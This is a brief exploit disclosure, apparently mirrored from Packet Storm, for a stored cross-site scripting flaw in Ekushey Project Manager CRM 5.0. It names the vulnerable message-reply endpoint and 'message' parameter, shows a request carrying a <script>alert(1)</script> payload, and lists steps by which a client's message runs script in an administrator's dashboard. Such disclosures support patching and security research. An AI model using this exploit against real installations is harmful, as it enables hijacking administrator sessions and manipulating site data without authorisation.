Share
## https://sploitus.com/exploit?id=PACKETSTORM:173391
# Exploit Title: Ekushey Project Manager CRM 5.0 - Stored XSS  
# Exploit Author: CraCkEr  
# Vendor: Creativeitem  
# Vendor Homepage: https://creativeitem.com/  
# Software Link: https://demo.creativeitem.com/ekushey/  
# Tested on: Windows 10 Pro  
# Impact: Manipulate the content of the site   
  
  
  
## Description  
  
Allow Attacker to inject malicious code into website, give ability to steal sensitive  
information, manipulate data, and launch additional attacks.  
  
  
  
Path: /ekushey/index.php/client/message/message_read/xxxxxxxx[random-msg-hash]  
  
POST parameter 'message' is vulnerable to XSS  
  
  
-----------------------------------------------  
POST /ekushey/index.php/client/message/send_reply/8c8936d3 HTTP/2  
  
-----------------------------------------------  
Content-Disposition: form-data; name="message"  
  
<script>alert(1)</script>  
-----------------------------------------------  
  
  
  
## Steps to Reproduce:  
  
1. Login as (Client)  
2. Go to [Message] on this Path: https://website/ekushey/index.php/client/message  
3. Select any Person to MSG (Clients or ADMINS]  
4. Inject your XSS Payload in [Replay Message]  
5. Send  
  
6. XSS Fired on Local Browser  
  
7. When ADMIN visit [Dashboard] or any section in Administration Panel on this Path : https://website/ekushey/index.php/admin/dashboard  
8. XSS Will Fire and Executed on his Browser  
  
  
  
[-] Done